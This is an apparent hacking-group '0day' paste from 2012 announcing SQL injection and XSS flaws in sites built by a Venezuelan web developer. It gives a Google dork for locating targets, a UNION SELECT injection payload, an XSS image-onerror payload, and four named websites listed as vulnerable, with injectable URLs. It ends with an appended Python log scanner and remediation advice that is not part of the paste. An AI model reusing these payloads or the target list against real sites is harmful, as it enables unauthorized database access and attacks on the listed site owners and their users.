diego123

0Day - www.tuwebvenezuela.com - SQLi / XSS Injection

Dec 1st, 2012
  1. ___ ___ ___ ___ _
  2. | _| _ |_ | _____ ____ _ ____ ____ | _| _____ |_ | _ _ | |_ ____ _ ____ ____
  3. | | | | | || _ || __|| || _ \ | __| | | | _ | | || | | || _| | ___|| || _ \ | __|
  4. | | | | | || | | ||__ \| || | | || __| | | | |_| | | || | | || | |__ \| || | | || __|
  5. | |_ |_| _| || | | | __| || || |_| || |__ | |_ |_____| _| || |_| || |__ __| || || |_| || |__
  6. |___| |___||_| |_||____||_||____/ |____| |___| |___||_____||____||____||_||____/ |____|
  7.  
  8. ##############################################################################################
  9. # ZERO - DAY BY [!]INSIDE[0]UTSIDE~TEAM @insid30utsid3 #HACKED! #
  10. # visit [www.inside0utside.com] for more information #
  11. # ~ [Maximus_Well] ~ [3sc0rp10n] - [Sr Xaoc] ~ #
  12. ##############################################################################################
  13.  
  14.  
  15. ######################################
  16. # => Author: Diego_Asencio
  17. # => Twitter: @Diego_Asencio
  18. # => Line: Gray Hat
  19. # => WorkGroup: [!]nside [0]utside
  20. # => WebSite: www.inside0utside.com
  21. # => Independent Consultant <=
  22. ######################################
  23. # => Dork: intext:Diseño y Programación Tu Web Venezuela
  24. # => Vendor: http://www.tuwebvenezuela.com/
  25. # => Title: www.tuwebvenezuela.com - SQLi Injection / XSS Injection
  26. ######################################
  27.  
  28.  
  29. #### INFORMATION ####
  30.  
  31. THE COMPANY www.tuwebvenezuela.com DEVELOPS DYNAMICALLY PROGRAMMED WEBSITES (PHP-MYSQL), MOST OF WHICH ALLOW XSS AND SQL INJECTION INTO THEIR DATABASE, GIVING THE ATTACKER ACCESS TO THE AFFECTED SYSTEM
  32.  
  33. ### END INFO ###
  34.  
  35. ### XPL ###
  36.  
  37. [SQLi]
  38.  
  39. union+all+select+0,1,2,3,4,5,6,7,8,9--
  40.  
  41. Payload: id=-4543 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,105,118,122,58),IFNULL(CAST(CHAR(77,83,114,107,100,88,70,82,72,115) AS CHAR),CHAR(32)),CHAR(58,118,103,116,58))
  42.  
  43. [XSS]
  44.  
  45. "><img src=http://www.inside0utside.com/logo.jpg onerror=alert("[!]nside [0]utside");>
  46.  
  47.  
  48. http://www.localhost.com/vernoticias.php?id=[SQLi]
  49.  
  50. http://www.localhost.com/vernoticias.php?id=[XSS]
  51.  
  52.  
  53. ### END XPL ###
  54.  
  55. ### AFFECTED WEBSITES ###
  56.  
  57. http://www.tusaludvascular.com/vernoticias.php?id=6'
  58.  
  59. http://www.feposor.com.ve/vernoticias.php?id=67'
  60.  
  61. http://www.sousasupply.com/productos.php?categoria=23'
  62.  
  63. http://www.asesoriatotal.com.ve/vernoticia.php?Id=89
  64.  
  65. ### END AFFECTED WEBSITES ###
  66.  
  67.  
  68. ############# GREETINGS ##############
  69.  
  70. => MAXIMUS WELL
  71. => SR XAOC
  72. => 3SC0RP10N
  73. => R4Z0R_BL4CK
  74.  
  75. ####################################
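
A defender-side check for the flaw class described above, as an added example that is not part of the original paste: it scans web access-log lines for requests in which the numeric parameters the paste names (`id`, `categoria`, `Id`) carry anything other than a plain integer. The log lines, client addresses and regex heuristics are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the paste reports as injectable; matched case-insensitively ("Id").
NUMERIC_PARAMS = {"id", "categoria"}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Heuristic markers (assumptions, not a complete signature set).
SQLI = re.compile(r"union\s+(all\s+)?select|--|'|\b(concat|char)\s*\(", re.I)
XSS = re.compile(r"[<>]|\bon\w+\s*=", re.I)

def classify(value):
    """Return None for a plain positive integer, else an anomaly label."""
    if re.fullmatch(r"\d{1,10}", value):
        return None
    if SQLI.search(value):
        return "sqli-like"
    if XSS.search(value):
        return "xss-like"
    return "non-numeric"

def scan(lines):
    """Return (path, parameter, label) for every suspicious numeric parameter."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue  # not an HTTP request line we understand
        url = urlsplit(match.group(1))
        # parse_qsl percent-decodes values and turns "+" into a space.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name.lower() in NUMERIC_PARAMS:
                label = classify(value)
                if label:
                    hits.append((url.path, name, label))
    return hits

# Constructed sample log lines (documentation-range addresses, made-up sizes).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Dec/2012:10:00:00 +0000] "GET /vernoticias.php?id=67 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Dec/2012:10:00:03 +0000] "GET /vernoticias.php?id=6%27 HTTP/1.1" 200 310',
    '203.0.113.9 - - [01/Dec/2012:10:00:05 +0000] "GET /vernoticias.php?id=-1+union+all+select+0,1,2-- HTTP/1.1" 200 4800',
    '203.0.113.9 - - [01/Dec/2012:10:00:09 +0000] "GET /productos.php?categoria=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(1)%3E HTTP/1.1" 200 4900',
    '203.0.113.7 - - [01/Dec/2012:10:01:00 +0000] "GET /vernoticia.php?Id=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Log matching only surfaces probing; the fix is to validate these parameters as integers, bind them in prepared statements, and HTML-encode them on output.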